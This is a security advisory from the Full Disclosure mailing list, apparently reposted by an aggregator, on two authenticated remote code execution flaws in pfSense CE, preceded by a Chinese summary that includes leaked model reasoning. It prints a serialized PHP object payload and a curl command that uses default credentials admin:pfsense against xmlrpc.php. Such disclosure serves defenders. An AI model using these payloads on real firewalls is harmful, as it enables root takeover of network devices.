[Full Disclosure] CVE-2025-69690 & CVE-2025-69691 — Authenticated RCE in Netgate pfSense CE 2.7.2 and 2.8.0
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读用户提供的文章内容。 这篇文章是关于pfSense社区版的安全漏洞公告。里面提到了两个CVE,分别是CVE-2025-69690和CVE-2025-69691。这两个漏洞都是经过身份验证的远程代码执行漏洞,影响了pfSense的不同版本。 第一个漏洞CVE-2025-69690是由于反序列化问题导致的,攻击者可以通过上传恶意备份文件来执行任意命令。第二个漏洞CVE-2025-69691则是XMLRPC接口中的exec_php方法没有适当的控制,允许攻击者执行任意PHP代码。 文章还提到,Netgate在收到报告后没有发布补丁,并且将这些漏洞归类为预期行为。这可能意味着用户需要自行采取措施来缓解风险。 接下来,我需要将这些信息浓缩到100字以内。要确保涵盖主要点:两个漏洞、影响版本、攻击方式、CVSS评分以及厂商的回应。 最后,组织语言使其简洁明了,直接描述内容而不需要开头语。 </think> 文章披露了Netgate pfSense社区版的两个高危漏洞:CVE-2025-69690和CVE-2025-69691。前者通过反序列化实现远程代码执行,后者利用XMLRPC接口直接执行PHP代码。两者均需身份验证,但厂商未发布补丁。 2026-2-16 21:8:3 Author: seclists.org(查看原文) 阅读量:2 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: privexploits via Fulldisclosure <fulldisclosure () seclists org>
Date: Mon, 16 Feb 2026 14:09:25 +0000
Advisory: Authenticated Remote Code Execution in pfSense CECVEs: CVE-2025-69690, CVE-2025-69691
Researcher: Nelson Adhepeau (privexploits () protonmail com)
Date: February 2026


== RESPONSIBLE DISCLOSURE NOTICE ==

This advisory is published in accordance with responsible disclosure practices. 

The vendor was notified on December 2, 2025, acknowledged the reports, and indicated no patches would be issued. 
Publication follows standard 90-day disclosure guidelines.

-------------------------------------------------------------

== OVERVIEW ==

Two independent authenticated Remote Code Execution
vulnerabilities were discovered in Netgate pfSense Community
Edition. Both were reproduced on clean installations. Vendor
was contacted and acknowledged the reports but classified both
as expected behavior for authenticated administrators.

-------------------------------------------------------------

== CVE-2025-69690 ==
Authenticated RCE via Unsafe Deserialization (pfSense CE 2.7.2)

CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-502: Deserialization of Untrusted Data
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

The pfSense configuration restore mechanism invokes
unserialize() on user-controlled data without class
whitelisting, input validation, or sandboxing.

A crafted backup file containing a malicious serialized PHP
object can inject arbitrary commands via the
post_reboot_commands property, executed through mwexec()
with full root privileges.

-- Affected Component --

backup/restore mechanism, config.php,
pfsense_module_installer class, unserialize() handling

-- Attack Vector --

1. Attacker authenticates as administrator
2. Uploads malicious configuration backup file
3. Triggers restore operation
4. pfSense unserializes attacker-controlled data
5. Commands execute as root via mwexec()

-- PoC Payload --

O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";}}

-- Impact --

- Arbitrary command execution as root
- Persistent compromise
- Complete firewall takeover
- Credential and configuration exfiltration

-- Vendor Response --

Netgate acknowledged the report. Classified as
"authenticated administrative abuse". No patch issued.
Vendor does not assign CVEs directly.

-------------------------------------------------------------

== CVE-2025-69691 ==
Authenticated RCE via XMLRPC exec_php (pfSense CE 2.8.0)

CVSS v3.1: 9.9 (Critical)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-284: Improper Access Control
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

pfSense CE 2.8.0 exposes an XMLRPC API method
pfsense.exec_php that executes arbitrary PHP code as root
without validation, sandboxing, or restrictions.

The endpoint is enabled by default, accessible over HTTPS
via Basic Authentication, and executes supplied code
immediately with full system privileges. Default credentials
(admin:pfsense) are widely deployed, significantly lowering
the exploitation barrier.

-- Affected Component --

xmlrpc.php, pfsense.exec_php method, XMLRPC API handler,
BasicAuth authentication layer

-- Attack Vector --

curl -k -u admin:pfsense \
  -d '<methodCall>
    <methodName>pfsense.exec_php</methodName>
    <params><param><value><string>
      system("id");
    </string></value></param></params>
  </methodCall>' \
  https://<target>/xmlrpc.php

-- Impact --

- Full remote root compromise
- Arbitrary file read/write
- Backdoor deployment
- Firewall rule manipulation
- Extraction of secrets and configurations

-- Vendor Response --

Netgate acknowledged the report. Classified as expected
behavior for authenticated users. No patch in pfSense CE
2.8.0. Still exploitable as of latest version at time
of disclosure.

-------------------------------------------------------------

== TIMELINE ==

- November 2025: Vulnerabilities discovered
- December 2, 2025: Initial report sent to Netgate
- Netgate acknowledged, no patch planned
- January 28, 2026: CVEs assigned by MITRE
- February 2026: Public disclosure

-------------------------------------------------------------

== REFERENCES ==

CVE-2025-69690:
https://cve.org/CVERecord?id=CVE-2025-69690

CVE-2025-69691:
https://cve.org/CVERecord?id=CVE-2025-69691

Researcher:
https://github.com/privlabs
https://linkedin.com/in/nelson-adhepeau

-------------------------------------------------------------
Nelson Adhepeau
Independent Security Researcherprivexploits () protonmail com


Envoyé avec un e-mail sécurisé Proton Mail.

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • [Full Disclosure] CVE-2025-69690 & CVE-2025-69691 — Authenticated RCE in Netgate pfSense CE 2.7.2 and 2.8.0 privexploits via Fulldisclosure (Feb 16)

文章来源: https://seclists.org/fulldisclosure/2026/Feb/16
如有侵权请联系:admin#unsafe.sh